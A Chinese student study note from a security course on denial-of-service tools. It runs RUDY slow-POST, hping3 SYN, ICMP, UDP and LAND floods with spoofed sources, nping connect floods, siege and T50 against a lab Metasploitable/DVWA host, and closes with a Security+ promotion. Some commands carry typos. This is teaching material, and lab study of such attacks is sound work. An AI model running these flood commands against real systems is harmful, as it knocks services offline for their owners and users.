【安全牛学习笔记】拒绝服务攻击工具

拒绝服务攻击工具

RUDY

- 慢速应用层HTTP POST攻击，与slowhttptest原理相同

- 每次只传输一个字节的数据

- 美剧“黑客军团”中曾提到此攻击手段

- 攻击有表单WEB页面，攻击时需指定攻击的参数名称

- https://sourceforge.net/projects/r-u-dead-yet/

root@K:~# cp /media/sf_D_DRIVE/R-U-Dead-Yet.zip

msfadmin@metasploitable:~$ ifconfig

192.168.1.119

[parameters]

URL: http://192.168.1.119/dvwa/login.php

number_of_connections: 500

attack_parameter: username

proxy_addr: ""

proxy_port: 0

root@K:~# cd rudy/

root@K:~/rudy# ./r-u-dead-yet-v2.2.py

[!] Using configuration file

[!] Attacking: http://192.168.1.119/dvwa/login.php

[!] with parameter: username

拒绝服务攻击工具

Hping3

- 几乎可以指定发送任何TCP/IP数据包，用于测试FW、端口扫描、性能测试

Syn Flood攻击

- hping3 -c 1000 -d 120 -S -w 64 -p 80 --flood --rand-source 1.1.1.1

- hping3 -S -P -U -p 80 --flood -rand-source 1.1.1.1

- hping3 -SARFUP -p 80 -flood --rand-source 1.1.1.1 (TCP Flood)

ICMP Flood攻击

- hping3 -q -n -a 1.1.1.1 --icmp -d 56 --flood 1.1.1.2

UDP Flood攻击

- hping3 -a 1.1.1.1 -udp -s 53 -d 100 -p 53 --flood 1.1.1.2

root@K:~/rudy# hping3 -c 1000 -d 120 -S -w 64 -p 80 --flood --rand-source 192.168.1.119

msfadmin@metasploitable:~$ netstat -ntu | more

Active Internet connections (w/o servers)

Proto Recv-Q Send-Q Local | Address Foreign Address Statc

udp 0 0 127.0.0.1:55724 127.0.0.1:55724 ESTABLISHED

root@K:~/rudy# ps aux | grep wireshark

root 3252 0.0 0.0 4308 792 S+ 05:49 0:00 sh -c wireshark

root 3254 21.5 17.0 1247272 353040 Sl+ 05:49 0:49 wireshark

root 3289 0.0 0.0 12680 1712 pts/0 S+ 05:51 0:00 grep wireshark

root@K:~/rudy# kill 3252

root@K:~/rudy# kill 3254

msfadmin@metasploitable:~$ sudo tcpdump -ieth0 -s0 -vv

root@K:~/rudy# hping3 -c 1000 -d 120 -S -w 64 -p 80 --flood --rand-source 192.168.1.119

root@K:~/rudy# hping3 -S -P -U -p 80 --flood -rand-source 192.168.1.119

root@K:~/rudy# hping3 -SARFUP -p 80 -flood --rand-source 192.168.1.119

root@K:~/rudy# hping3 -q -n -a 1.1.1.1 --icmp -d 200 --flood 192.168.1.119

//安静模式，不解析域名，伪造源地址，icmp的flood,数据大小

root@K:~/rudy# hping3 -a 1.1.1.1 -udp -s 53 -d 100 -p 53 --flood 192.168.1.119

//伪造源地址，udp的包，指定源端口，数据段100，目标端口

拒绝服务攻击工

LAND攻击

- 特殊种类的SYN Flood攻击

- 源地址、目的地址都是受害者，受害者与自己完成三次握手

- hping3 -n -a 1.1.1.1 -S -d 100 -p 80 --flood 1.1.1.1

TCP全连接DoS攻击

- nping --tcp-connect --rate=10000 -c 1000000000 -q 1.1.1.1

查公网IP

- nping --echo-client "public" echo.nmap.org --udp

root@K:~/rudy# hping -a 192.168.1.119 -S -p 22 --flood 192.168.1.119

msfadmin@metasploitable:~$ sudo tcpdump -ieth0 -s 0 -vv

root@K:~/rudy# nping --tcp-connect --rate=10000 -c 1000000000 -q 192.168.1.119

root@K:~/rudy# nping --echo-client "public" echo.nmap.org --udp

Staring Nping 0.7.12 ( http://nmap.org/nping) at 2016-06-30 EDT

SENT (2.4498s) UDP 192.168.1.116:53 > 45.33.32.156:40125 ttl=64 id=47349 iplen=28

CAPT (2.5630s) UDP 114.111.166.142:28113 > 45.33.32.156:40125 ttl=47 id=47349 iplen=28

RCVD (2.6373s) ICMP [45.33.32.156 > 192.168.1.116 Port unreachable (type=3/code=3) ] IP [ttl=46 id=2

3017 iplen=56 ]

SENT (3.4508s) UDP 192.168.1.116:53 > 45.33.32.156:40125 ttl=64 id=47349 iplen=28

SENT (4.4528s) UDP 192.168.1.116:53 > 45.33.32.156:40125 ttl=64 id=47349 iplen=28

SENT (5.4528s) UDP 192.168.1.116:53 > 45.33.32.156:40125 ttl=64 id=47349 iplen=28

SENT (6.4557s) UDP 192.168.1.116:53 > 45.33.32.156:40125 ttl=64 id=47349 iplen=28

Max rtt: 187.362ms | Min rtt: 187.362ms | Avg rtt: 187.362ms

Raw packets sent: 5 (1408) | Rcvd: 1 (568) | Lost: 4 (80:00%) | Echoed: 1 (468)

Nping done: 1 IP address pinged in 7.46 seconds

拒绝服务攻击工具

Siege

- http/https 压力测试工具，模拟多个用户并发访问请求

- siege -g http://1.1.1.1/a.php / 1.1.1.1

- siege -i -c 1000 http://1.1.1.1/a.php -A siegehttp

- 同时攻击多个url，使用-f调用字典文件

/etc/siege/urls.txt

T50网络压力测试

- t50 1.1.1.1 --flood --turbo -S --protocol TCP --dport 80

- t50 1.1.1.1 --flood --turbo -S TCP UDP OSPF EIGRP --dport 2

root@K:~/rudy# siege -g http://192.168.1.119

HEAD / HTTP/1.0

Host: 192.168.1.119

Accept: */*

User-Agent: Mozilla/5.0 (pc-x86_64-linux-gnu) Siege/3.0.8

Connection: close

HTTP/1.1 200 OK

Date: Thu, 30 Jun 2016 11:59:06 GMT

Server: Apache/2.2.8 (Ubuntu) DAV/2

X-Powered-By: PHP/5.2.4-2ubuntu5.10

Connection: close

Content-Type: text/html

root@K:~/rudy# siege -g 192.168.1.119

HEAD / HTTP/1.0

Host: 192.168.1.119

Accept: */*

User-Agent: Mozilla/5.0 (pc-x86_64-linux-gnu) Siege/3.0.8

Connection: close

HTTP/1.1 200 OK

Date: Thu, 30 Jun 2016 11:59:06 GMT

Server: Apache/2.2.8 (Ubuntu) DAV/2

X-Powered-By: PHP/5.2.4-2ubuntu5.10

Connection: close

Content-Type: text/html

root@K:~/rudy# iege -i -c 1000 http://192.168.1.1191/a.php -A httttttttttttp

** SIEGE 3.0.8

** Preparing 1000 concurrent users for battle

The server is now under siege...

root@K:~/rudy# iege -i -c 10000 http://192.168.1.1191/dvwa/login.php -A httttttttttttp

** SIEGE 3.0.8

** Preparing 1000 concurrent users for battle

The server is now under siege...

Lifting the server siege... done

Transactions: 1192 hits

Availability: 100.00 %

Elapsed time: 19.00 secs

Data transferred: 1.02 MB

Response time: 4.13 secs

Transaction rate: 62.95 trans/sec

Throughput: 0.05 MB/sec

Concurrency: 259.86

Successful transactions: 1196

Failed transactions: 0

Longest transaction: 17.06

Shortest transaction: 0.00

FILE: /var/log/siege.log

You can disable this annoying message by editing

the .siegerc file in your home direstory; change

the directive 'show-logfile' to false.

root@K:~/rudy# iege -i -c 1000 http://192.168.1.1191/dvwa/login.php -A httttttttttttp -vv

root@K:~/rudy# vi /etc/siege/urls.txt

192.168.1.119/dvwa/login.php

root@K:~/rudy# siege -i -c 1000 -vv

------------------------------------------------------------------------------

root@k:~# t50 -h

T50 Experimental Mixed Packet Injector Tool 5.4.1-rc1

Originally created by Nelson Brito <nbrito@sekure.org>

Now produced by Fernando Mercês <fernando@mentebinaria.com.br>

Usage: T50 <host> [/CIDR] [options]

Common Options:

--threshold NUM Threshold of packets to send (default 1000)

--flood This option supersedes the 'threshold'

--encapsulated Encapsulated protocol (GRE) (default OFF)

-B,--bogus-csum Bogus checksum (default OFF)

--turbo Extend the performance (default OFF)

-v,--version Print version and exit

-h,--help Display this help and exit

GRE Options:

--gre-seq-present GRE sequence # present (default OFF)

--gre-key-present GRE key present (default OFF)

--gre-sum-present GRE checksum present (default OFF)

--gre-key NUM GRE key (default RANDOM)

--gre-sequence NUM GRE sequence # (default RANDOM)

--gre-saddr ADDR GRE IP source IP address (default RANDOM)

--gre-daddr ADDR GRE IP destination IP address (default RANDOM)

DCCP/TCP/UDP Options:

--sport NUM DCCP|TCP|UDP source port (default RANDOM)

--dport NUM DCCP|TCP|UDP destination port (default RANDOM)

IP Options:

-s,--saddr ADDR IP source IP address (default RANDOM)

--tos NUM IP type of service (default 0x40)

--id NUM IP identification (default RANDOM)

--frag-offset NUM IP fragmentation offset (default 0)

--ttl NUM IP time to live (default 255)

--protocol PROTO IP protocol (default TCP)

ICMP Options:

--icmp-type NUM ICMP type (default 8)

--icmp-code NUM ICMP code (default 0)

--icmp-gateway ADDR ICMP redirect gateway (default RANDOM)

--icmp-id NUM ICMP identification (default RANDOM)

--icmp-sequence NUM ICMP sequence # (default RANDOM)

IGMP Options:

--igmp-type NUM IGMPv1/v3 type (default 0x11)

--igmp-code NUM IGMPv1/v3 code (default 0)

--igmp-group ADDR IGMPv1/v3 address (default RANDOM)

--igmp-qrv NUM IGMPv3 QRV (default RANDOM)

--igmp-suppress IGMPv3 suppress router-side (default OFF)

--igmp-qqic NUM IGMPv3 QQIC (default RANDOM)

--igmp-grec-type NUM IGMPv3 group record type (default 1)

--igmp-sources NUM IGMPv3 # of sources (default 2)

--igmp-multicast ADDR IGMPv3 group record multicast (default RANDOM)

--igmp-address ADDR,... IGMPv3 source address(es) (default RANDOM)

TCP Options:

--acknowledge NUM TCP ACK sequence # (default RANDOM)

--sequence NUM TCP SYN sequence # (default RANDOM)

--data-offset NUM TCP data offset (default 5)

-F,--fin TCP FIN flag (default OFF)

-S,--syn TCP SYN flag (default OFF)

-R,--rst TCP RST flag (default OFF)

-P,--psh TCP PSH flag (default OFF)

-A,--ack TCP ACK flag (default OFF)

-U,--urg TCP URG flag (default OFF)

-E,--ece TCP ECE flag (default OFF)

-C,--cwr TCP CWR flag (default OFF)

-W,--window NUM TCP Window size (default NONE)

--urg-pointer NUM TCP URG pointer (default NONE)

--mss NUM TCP Maximum Segment Size (default NONE)

--wscale NUM TCP Window Scale (default NONE)

--tstamp NUM:NUM TCP Timestamp (TSval:TSecr) (default NONE)

--sack-ok TCP SACK-Permitted (default OFF)

--ttcp-cc NUM T/TCP Connection Count (CC) (default NONE)

--ccnew NUM T/TCP Connection Count (CC.NEW) (default NONE)

--ccecho NUM T/TCP Connection Count (CC.ECHO) (default NONE)

--sack NUM:NUM TCP SACK Edges (Left:Right) (default NONE)

--md5-signature TCP MD5 signature included (default OFF)

--authentication TCP-AO authentication included (default OFF)

--auth-key-id NUM TCP-AO authentication key ID (default 1)

--auth-next-key NUM TCP-AO authentication next key (default 1)

--nop TCP No-Operation (default EOL)

EGP Options:

--egp-type NUM EGP type (default 3)

--egp-code NUM EGP code (default 3)

--egp-status NUM EGP status (default 1)

--egp-as NUM EGP autonomous system (default RANDOM)

--egp-sequence NUM EGP sequence # (default RANDOM)

--egp-hello NUM EGP hello interval (default RANDOM)

--egp-poll NUM EGP poll interval (default RANDOM)

RIP Options:

--rip-command NUM RIPv1/v2 command (default 2)

--rip-family NUM RIPv1/v2 address family (default 2)

--rip-address ADDR RIPv1/v2 router address (default RANDOM)

--rip-metric NUM RIPv1/v2 router metric (default RANDOM)

--rip-domain NUM RIPv2 router domain (default RANDOM)

--rip-tag NUM RIPv2 router tag (default RANDOM)

--rip-netmask ADDR RIPv2 router subnet mask (default RANDOM)

--rip-next-hop ADDR RIPv2 router next hop (default RANDOM)

--rip-authentication RIPv2 authentication included (default OFF)

--rip-auth-key-id NUM RIPv2 authentication key ID (default 1)

--rip-auth-sequence NUM RIPv2 authentication sequence # (default RANDOM)

DCCP Options:

--dccp-data-offset NUM DCCP data offset (default VARY)

--dccp-cscov NUM DCCP checksum coverage (default 0)

--dccp-ccval NUM DCCP HC-Sender CCID (default RANDOM)

--dccp-type NUM DCCP type (default 0)

--dccp-extended DCCP extend for sequence # (default OFF)

--dccp-sequence-1 NUM DCCP sequence # (default RANDOM)

--dccp-sequence-2 NUM DCCP extended sequence # (default RANDOM)

--dccp-sequence-3 NUM DCCP sequence # low (default RANDOM)

--dccp-service NUM DCCP service code (default RANDOM)

--dccp-acknowledge-1 NUM DCCP acknowledgment # high (default RANDOM)

--dccp-acknowledge-2 NUM DCCP acknowledgment # low (default RANDOM)

--dccp-reset-code NUM DCCP reset code (default RANDOM)

RSVP Options:

--rsvp-flags NUM RSVP flags (default 1)

--rsvp-type NUM RSVP message type (default 1)

--rsvp-ttl NUM RSVP time to live (default 254)

--rsvp-session-addr ADDR RSVP SESSION destination address (default RANDOM)

--rsvp-session-proto NUM RSVP SESSION protocol ID (default 1)

--rsvp-session-flags NUM RSVP SESSION flags (default 1)

--rsvp-session-port NUM RSVP SESSION destination port (default RANDOM)

--rsvp-hop-addr ADDR RSVP HOP neighbor address (default RANDOM)

--rsvp-hop-iface NUM RSVP HOP logical interface (default RANDOM)

--rsvp-time-refresh NUM RSVP TIME refresh interval (default 360)

--rsvp-error-addr ADDR RSVP ERROR node address (default RANDOM)

--rsvp-error-flags NUM RSVP ERROR flags (default 2)

--rsvp-error-code NUM RSVP ERROR code (default 2)

--rsvp-error-value NUM RSVP ERROR value (default 8)

--rsvp-scope NUM RSVP SCOPE # of address(es) (default 1)

--rsvp-address ADDR,... RSVP SCOPE address(es) (default RANDOM)

--rsvp-style-option NUM RSVP STYLE option vector (default 18)

--rsvp-sender-addr ADDR RSVP SENDER TEMPLATE address (default RANDOM)

--rsvp-sender-port NUM RSVP SENDER TEMPLATE port (default RANDOM)

--rsvp-tspec-traffic RSVP TSPEC service traffic (default OFF)

--rsvp-tspec-guaranteed RSVP TSPEC service guaranteed (default OFF)

--rsvp-tspec-r NUM RSVP TSPEC token bucket rate (default RANDOM)

--rsvp-tspec-b NUM RSVP TSPEC token bucket size (default RANDOM)

--rsvp-tspec-p NUM RSVP TSPEC peak data rate (default RANDOM)

--rsvp-tspec-m NUM RSVP TSPEC minimum policed unit (default RANDOM)

--rsvp-tspec-M NUM RSVP TSPEC maximum packet size (default RANDOM)

--rsvp-adspec-ishop NUM RSVP ADSPEC IS HOP count (default RANDOM)

--rsvp-adspec-path NUM RSVP ADSPEC path b/w estimate (default RANDOM)

--rsvp-adspec-m NUM RSVP ADSPEC minimum path latency (default RANDOM)

--rsvp-adspec-mtu NUM RSVP ADSPEC composed MTU (default RANDOM)

--rsvp-adspec-guaranteed RSVP ADSPEC service guaranteed (default OFF)

--rsvp-adspec-Ctot NUM RSVP ADSPEC ETE composed value C (default RANDOM)

--rsvp-adspec-Dtot NUM RSVP ADSPEC ETE composed value D (default RANDOM)

--rsvp-adspec-Csum NUM RSVP ADSPEC SLR point composed C (default RANDOM)

--rsvp-adspec-Dsum NUM RSVP ADSPEC SLR point composed D (default RANDOM)

--rsvp-adspec-controlled RSVP ADSPEC service controlled (default OFF)

--rsvp-confirm-addr ADDR RSVP CONFIRM receiver address (default RANDOM)

IPSEC Options:

--ipsec-ah-length NUM IPSec AH header length (default NONE)

--ipsec-ah-spi NUM IPSec AH SPI (default RANDOM)

--ipsec-ah-sequence NUM IPSec AH sequence # (default RANDOM)

--ipsec-esp-spi NUM IPSec ESP SPI (default RANDOM)

--ipsec-esp-sequence NUM IPSec ESP sequence # (default RANDOM)

EIGRP Options:

--eigrp-opcode NUM EIGRP opcode (default 1)

--eigrp-flags NUM EIGRP flags (default RANDOM)

--eigrp-sequence NUM EIGRP sequence # (default RANDOM)

--eigrp-acknowledge NUM EIGRP acknowledgment # (default RANDOM)

--eigrp-as NUM EIGRP autonomous system (default RANDOM)

--eigrp-type NUM EIGRP type (default 258)

--eigrp-length NUM EIGRP length (default NONE)

--eigrp-k1 NUM EIGRP parameter K1 value (default 1)

--eigrp-k2 NUM EIGRP parameter K2 value (default 0)

--eigrp-k3 NUM EIGRP parameter K3 value (default 1)

--eigrp-k4 NUM EIGRP parameter K4 value (default 0)

--eigrp-k5 NUM EIGRP parameter K5 value (default 0)

--eigrp-hold NUM EIGRP parameter hold time (default 360)

--eigrp-ios-ver NUM.NUM EIGRP IOS release version (default 12.4)

--eigrp-rel-ver NUM.NUM EIGRP PROTO release version (default 1.2)

--eigrp-next-hop ADDR EIGRP [in|ex]ternal next-hop (default RANDOM)

--eigrp-delay NUM EIGRP [in|ex]ternal delay (default RANDOM)

--eigrp-bandwidth NUM EIGRP [in|ex]ternal bandwidth (default RANDOM)

--eigrp-mtu NUM EIGRP [in|ex]ternal MTU (default 1500)

--eigrp-hop-count NUM EIGRP [in|ex]ternal hop count (default RANDOM)

--eigrp-load NUM EIGRP [in|ex]ternal load (default RANDOM)

--eigrp-reliability NUM EIGRP [in|ex]ternal reliability (default RANDOM)

--eigrp-daddr ADDR/CIDR EIGRP [in|ex]ternal address(es) (default RANDOM)

--eigrp-src-router ADDR EIGRP external source router (default RANDOM)

--eigrp-src-as NUM EIGRP external autonomous system (default RANDOM)

--eigrp-tag NUM EIGRP external arbitrary tag (default RANDOM)

--eigrp-proto-metric NUM EIGRP external protocol metric (default RANDOM)

--eigrp-proto-id NUM EIGRP external protocol ID (default 2)

--eigrp-ext-flags NUM EIGRP external flags (default RANDOM)

--eigrp-address ADDR EIGRP multicast sequence address (default RANDOM)

--eigrp-multicast NUM EIGRP multicast sequence # (default RANDOM)

--eigrp-authentication EIGRP authentication included (default OFF)

--eigrp-auth-key-id NUM EIGRP authentication key ID (default 1)

OSPF Options:

--ospf-type NUM OSPF type (default 1)

--ospf-length NUM OSPF length (default NONE)

--ospf-router-id ADDR OSPF router ID (default RANDOM)

--ospf-area-id ADDR OSPF area ID (default 0.0.0.0)

-1,--ospf-option-MT OSPF multi-topology / TOS-based (default RANDOM)

-2,--ospf-option-E OSPF external routing capability (default RANDOM)

-3,--ospf-option-MC OSPF multicast capable (default RANDOM)

-4,--ospf-option-NP OSPF NSSA supported (default RANDOM)

-5,--ospf-option-L OSPF LLS data block contained (default RANDOM)

-6,--ospf-option-DC OSPF demand circuits supported (default RANDOM)

-7,--ospf-option-O OSPF Opaque-LSA (default RANDOM)

-8,--ospf-option-DN OSPF DOWN bit (default RANDOM)

--ospf-netmask ADDR OSPF router subnet mask (default RANDOM)

--ospf-hello-interval NUM OSPF HELLO interval (default RANDOM)

--ospf-hello-priority NUM OSPF HELLO router priority (default 1)

--ospf-hello-dead NUM OSPF HELLO router dead interval (default 360)

--ospf-hello-design ADDR OSPF HELLO designated router (default RANDOM)

--ospf-hello-backup ADDR OSPF HELLO backup designated (default RANDOM)

--ospf-neighbor NUM OSPF HELLO # of neighbor(s) (default NONE)

--ospf-address ADDR,... OSPF HELLO neighbor address(es) (default RANDOM)

--ospf-dd-mtu NUM OSPF DD MTU (default 1500)

--ospf-dd-dbdesc-MS OSPF DD master/slave bit option (default RANDOM)

--ospf-dd-dbdesc-M OSPF DD more bit option (default RANDOM)

--ospf-dd-dbdesc-I OSPF DD init bit option (default RANDOM)

--ospf-dd-dbdesc-R OSPF DD out-of-band resync (default RANDOM)

--ospf-dd-sequence NUM OSPF DD sequence # (default RANDOM)

--ospf-dd-include-lsa OSPF DD include LSA header (default OFF)

--ospf-lsa-age NUM OSPF LSA age (default 360)

--ospf-lsa-do-not-age OSPF LSA do not age (default OFF)

--ospf-lsa-type NUM OSPF LSA type (default 1)

--ospf-lsa-id ADDR OSPF LSA ID address (default RANDOM)

--ospf-lsa-router ADDR OSPF LSA advertising router (default RANDOM)

--ospf-lsa-sequence NUM OSPF LSA sequence # (default RANDOM)

--ospf-lsa-metric NUM OSPF LSA metric (default RANDOM)

--ospf-lsa-flag-B OSPF Router-LSA border router (default RANDOM)

--ospf-lsa-flag-E OSPF Router-LSA external router (default RANDOM)

--ospf-lsa-flag-V OSPF Router-LSA virtual router (default RANDOM)

--ospf-lsa-flag-W OSPF Router-LSA wild router (default RANDOM)

--ospf-lsa-flag-NT OSPF Router-LSA NSSA translation (default RANDOM)

--ospf-lsa-link-id ADDR OSPF Router-LSA link ID (default RANDOM)

--ospf-lsa-link-data ADDR OSPF Router-LSA link data (default RANDOM)

--ospf-lsa-link-type NUM OSPF Router-LSA link type (default 1)

--ospf-lsa-attached ADDR OSPF Network-LSA attached router (default RANDOM)

--ospf-lsa-larger OSPF ASBR/NSSA-LSA ext. larger (default OFF)

--ospf-lsa-forward ADDR OSPF ASBR/NSSA-LSA forward (default RANDOM)

--ospf-lsa-external ADDR OSPF ASBR/NSSA-LSA external (default RANDOM)

--ospf-vertex-router OSPF Group-LSA type router (default RANDOM)

--ospf-vertex-network OSPF Group-LSA type network (default RANDOM)

--ospf-vertex-id ADDR OSPF Group-LSA vertex ID (default RANDOM)

--ospf-lls-extended-LR OSPF LLS Extended option LR (default OFF)

--ospf-lls-extended-RS OSPF LLS Extended option RS (default OFF)

--ospf-authentication OSPF authentication included (default OFF)

--ospf-auth-key-id NUM OSPF authentication key ID (default 1)

--ospf-auth-sequence NUM OSPF authentication sequence # (default RANDOM)

Some considerations while running this program:

1. There is no limitation of using as many options as possible.

2. Report T50 bugs at http://t50.sf.net.

3. Some header fields with default values MUST be set to '0' for RANDOM.

4. Mandatory arguments to long options are mandatory for short options too.

5. Be nice when using T50, the author DENIES its use for DoS/DDoS purposes.

6. Running T50 with '--protocol T50' option, sends ALL protocols sequentially.

------------------------------------------------------------------------------

root@k:~# t50 192.168.1.119 --flood --turbo -S --protocol TCP --dport 80

entering in flood mode...

activating turbo...

hit CTRL+C to break.

T50 5.4.1-rc1 successfully launched on Jul 8th 2016 00:32:15

root@k:~# t50 192.168.1.119 --flood --turbo -S TCP UDP OSPF EIGRP --dport 22

entering in flood mode...

activating turbo...

hit CTRL+C to break.

T50 5.4.1-rc1 successfully launched on Jul 8th 2016 00:32:15

该笔记为安全牛课堂学员笔记，想看此课程或者信息安全类干货可以移步到安全牛课堂

Security+认证为什么是互联网+时代最火爆的认证？

牛妹先给大家介绍一下Security+

Security+ 认证是一种中立第三方认证，其发证机构为美国计算机行业协会CompTIA ；是和CISSP、ITIL 等共同包含在内的国际 IT 业 10 大热门认证之一，和CISSP偏重信息安全管理相比，Security+ 认证更偏重信息安全技术和操作。

通过该认证证明了您具备网络安全，合规性和操作安全，威胁和漏洞，应用程序、数据和主机安全，访问控制和身份管理以及加密技术等方面的能力。因其考试难度不易，含金量较高，目前已被全球企业和安全专业人士所普遍采纳。

Security+认证如此火爆的原因？

原因一：在所有信息安全认证当中，偏重信息安全技术的认证是空白的， Security+认证正好可以弥补信息安全技术领域的空白。

目前行业内受认可的信息安全认证主要有CISP和CISSP，但是无论CISP还是CISSP都是偏重信息安全管理的，技术知识讲的宽泛且浅显，考试都是一带而过。而且CISSP要求持证人员的信息安全工作经验都要5年以上，CISP也要求大专学历4年以上工作经验，这些要求无疑把有能力且上进的年轻人的持证之路堵住。在现实社会中，无论是找工作还是升职加薪，或是投标时候报人员，认证都是必不可少的，这给年轻人带来了很多不公平。而Security+的出现可以扫清这些年轻人职业发展中的障碍，由于Security+偏重信息安全技术，所以对工作经验没有特别的要求。只要你有IT相关背景，追求进步就可以学习和考试。

原因二： IT运维人员工作与翻身的利器。

在银行、证券、保险、信息通讯等行业，IT运维人员非常多，IT运维涉及的工作面也非常广。是一个集网络、系统、安全、应用架构、存储为一体的综合性技术岗。虽然没有程序猿们“生当做光棍，死亦写代码”的悲壮，但也有着“锄禾日当午，不如运维苦“的感慨。天天对着电脑和机器，时间长了难免有对于职业发展的迷茫和困惑。Security+国际认证的出现可以让有追求的IT运维人员学习网络安全知识，掌握网络安全实践。职业发展朝着网络安全的方向发展，解决国内信息安全人才的匮乏问题。另外，即使不转型，要做好运维工作，学习安全知识取得安全认证也是必不可少的。

原因三：接地气、国际范儿、考试方便、费用适中！

CompTIA作为全球ICT领域最具影响力的全球领先机构,在信息安全人才认证方面是专业、公平、公正的。Security+认证偏重操作且和一线工程师的日常工作息息相关。适合银行、证券、保险、互联网公司等IT相关人员学习。作为国际认证在全球147个国家受到广泛的认可。

在目前的信息安全大潮之下，人才是信息安全发展的关键。而目前国内的信息安全人才是非常匮乏的，相信Security+认证一定会成为最火爆的信息安全认证。

【安全牛学习笔记】拒绝服务攻击工具

相关文章

值得推荐的C/C++框架和库 (真的很强大)

1021.安全资源共享

复现数据增强实验（1）--Contextual Augmentation: Data Augmentation by Words with Paradigmatic Relations

物联网概论（IoT）_Chp5 物联网通信 Zigbee/蓝牙/UWB/WLAN/WiMax

SpringCloud 微服务工具集v1.1

RibbitMQ 实战教程

vulhub Brainpan:1

实时Linux之PREEMPT_RT篇